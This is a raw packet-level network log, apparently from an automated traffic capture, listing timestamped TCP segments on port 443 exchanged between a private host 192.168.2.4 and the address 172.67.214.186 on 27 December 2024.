                                                                                                                                      Dec 27, 2024 10:21:53.385390997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.385443926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.391115904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.391132116 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.391207933 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.391222000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.391273022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.397125006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.397140026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.397218943 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.397233963 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.397284985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.402334929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.402352095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.402400970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.402414083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.402440071 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.402456999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.408308029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.408335924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.408380985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.408395052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.408426046 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.408447027 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.413861036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.413877964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.413950920 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.413964033 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.414009094 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.419863939 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.419878006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.419939995 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.419954062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.420002937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.425780058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.425795078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.425860882 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.425874949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.425921917 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.586579084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.586596012 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.586788893 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.586798906 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.586843967 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.592534065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.592549086 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.592626095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.592638016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.592683077 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.598417044 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.598431110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.598501921 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.598510981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.598550081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.604419947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.604435921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.604500055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.604509115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.604547977 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.609674931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.609690905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.609747887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.609755993 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.609797001 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.615256071 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.615271091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.615338087 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.615345001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.615389109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.621269941 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.621287107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.621352911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.621361971 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.621402979 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.627196074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.627213955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.627280951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.627289057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.627331972 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.788845062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.788865089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.789031982 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.789047956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.789099932 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.794111013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.794126987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.794202089 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.794215918 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.794270039 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.800049067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.800064087 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.800142050 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.800163984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.800209999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.806001902 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.806019068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.806082964 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.806097031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.806144953 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.811279058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.811294079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.811362028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.811376095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.811425924 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.817617893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.817634106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.817702055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.817714930 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.817763090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.822886944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.822904110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.822974920 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.822988987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.823048115 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.828741074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.828756094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.828828096 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.828856945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.828902006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.990232944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.990252018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.990382910 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.990411043 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.990463018 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.995515108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.995532036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.995623112 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.995637894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.995724916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.001378059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.001403093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.001477003 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.001513958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.001562119 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.007381916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.007396936 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.007477999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.007498026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.007551908 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.012651920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.012666941 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.012739897 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.012761116 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.012813091 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.018961906 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.018976927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.019047022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.019069910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.019124031 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.024245024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.024259090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.024341106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.024363041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.024409056 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.030183077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.030198097 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.030304909 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.030323982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.030375957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.191317081 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.191339016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.191592932 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.191620111 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.191674948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.197148085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.197163105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.197246075 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.197266102 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.197315931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.203142881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.203161001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.203242064 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.203262091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.203310966 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.208399057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.208415985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.208493948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.208523989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.208570957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.214413881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.214432955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.214524984 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.214541912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.214595079 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.220016003 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.220032930 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.220108032 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.220124960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.220176935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.225899935 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.225917101 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.225992918 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.226007938 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.226057053 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.231935978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.231952906 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.232022047 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.232038021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.232088089 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.393289089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.393305063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.393527985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.393558025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.393626928 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.398646116 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.398659945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.398750067 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.398770094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.398837090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.404448986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.404464960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.404536009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.404551029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.404601097 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.410459995 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.410476923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.410557032 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.410577059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.410626888 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.415745974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.415760994 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.415841103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.415857077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.415904999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.422048092 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.422064066 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.422159910 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.422177076 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.422231913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.427448988 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.427463055 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.427558899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.427598000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.427644014 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.433257103 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.433274031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.433355093 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.433376074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.433419943 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.594926119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.594945908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.594995022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.595026970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.595052004 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.595072031 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.600153923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.600171089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.600212097 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.600229025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.600253105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.600271940 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.606157064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.606173038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.606224060 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.606252909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.606304884 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.612075090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.612091064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.612143993 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.612159967 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.612214088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.618086100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.618103027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.618165016 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.618185043 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.618231058 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.623656034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.623672009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.623752117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.623769045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.623817921 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.629661083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.629676104 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.629739046 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.629755020 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.629803896 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.634907007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.634932995 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.634983063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.635004997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.635026932 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.635061979 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.796606064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.796624899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.796828985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.796847105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.796906948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.802572966 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.802588940 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.802789927 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.802804947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.802856922 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.807879925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.807908058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.807974100 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.807987928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.808039904 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.813744068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.813759089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.813832998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.813847065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.813896894 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.819737911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.819753885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.819829941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.819854021 CET44349745172.67.214.186192.168.2.4
